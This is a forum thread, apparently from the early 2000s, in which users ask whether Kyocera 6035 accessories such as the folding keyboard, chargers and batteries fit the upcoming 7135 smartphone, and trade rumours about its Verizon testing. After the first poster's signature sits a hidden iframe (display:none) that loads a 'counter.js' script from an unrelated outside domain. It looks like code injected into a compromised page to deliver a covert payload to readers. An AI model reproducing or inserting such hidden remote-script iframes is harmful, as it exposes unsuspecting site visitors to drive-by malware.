+ Reply to Thread

6035 Accessories compatibility?

Anyone know if the current 6035 accessories, such as the Kyocera folding keyboard, would work with the 7135? It may be too early to find out for sure, but I would hate to have those accessories go to waste

-Shahid<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Should we strike against repetitive questions?

Guest,

As posted previously in this thread
    [quote:f1abfe8771="gellmanb"]The Stowaway keyboard will be available immediately on release. For those who bought the 6035 version -- good news. You'll need only a new cable. There will be no cradle required for the keyboard with the 7135, so there's less to carry. The compromise this time is that the phone is simply laid on the table, and you adjust the screen angle to suit you.[/quote:f1abfe8771]

Great, didn't see that paragraph from the other thread.

So, I imagine the way it would work is the new cable will connect directly from the keyboard connector to the phone. The lack of a cradle is a little strange though. I think it might be tough to get a good angle on the screen with it lying flat.

-Shahid

Since the 7135 is a clam shell style hadnset, you can lay it down and adjust the uper half (where the screen is) to best suit the angle of viewing.

smartphone accessories

So far kyo has kept the same basic port design so "most" of the charging equipment and in my case my HF CLA that I use in my car, the same for almost all it's models stemming from the qcp 2035 on up. I hope they don't change anything. I currently use the kwc2235 for my 1x high speed access and the 6035 for my daily business. The cool thing is that I can use the same data cord that I bought for the 2235 for my 6035 and visa versa for the HF cla. Works well for me on the weekends when I don't feel like lugging my 6035 around with me. Now with the 7135 it looks like I'm going to get the best of all my worlds in one handset. I'm a corporate sales rep for Verizon and we got "unofficial word" yesterday the 7135 is in "product testing", launch dates TBA based on how fast it passes testing. I can't wait !!!... I'm going to try and smooze my way into a beta testing group if possible. Alot of my clients are now looking at the audiovox THERA, which is really a pda first and phone client second with windows as it's operating system, but I'm still holding out for the 7135, and with the Thera at $799 a pop if the 7135 comes out at 500 to 600 there won't be any bartering on this one.
    I'm a casual visitor here, but if I get a hold of one I'll try to keep people posted on what I like or dislike.

Thanks for the great news semm71! Here's hoping that the Verizon testing goes very well and very quickly!

I work for a reseller of Verizon phones. I was talking to my Verizon rep, and she had no idea about the 7135. So any way to get one of us to be a beta tester as well???? Unfortunately working for a Verizon dealer, you know how much we as dealers are stuck paying for phones, not to mention something like a 7135........

Wow, there sure are a lot of Verizon sales reps here! I'm a reseller myself in VA... I know exactly what you mean about having to pay out the arse for new phones as a reseller! I paid $550 for my 6035 a couple months after it came out!

On a related note, the pictures in this forum suggest that the two phones might just use the same battery.

If that is the case, that'll be nice since those of us with more than one battery might actually find a use for their spares with the mA guzzling backlight and phone on this puppy.

--isnoop

isnoop,

Sorry to be the bearer of bad news, but I just checked with my reliable source and it turns out that the 7135 has a different battery. The new one is actually longer and thinner. Sad but true.

[quote:8531d7029c="Markito Burrito"]isnoop,

Sorry to be the bearer of bad news, but I just checked with my reliable source and it turns out that the 7135 has a different battery. The new one is actually longer and thinner. Sad but true.[/quote:8531d7029c]

Shame...
    Guess the small collection of batteries I've accumulated will just have to go up on eBay with the rest of the mess come 2003.

Anyway, you can't argue with progress, right?

--isnoop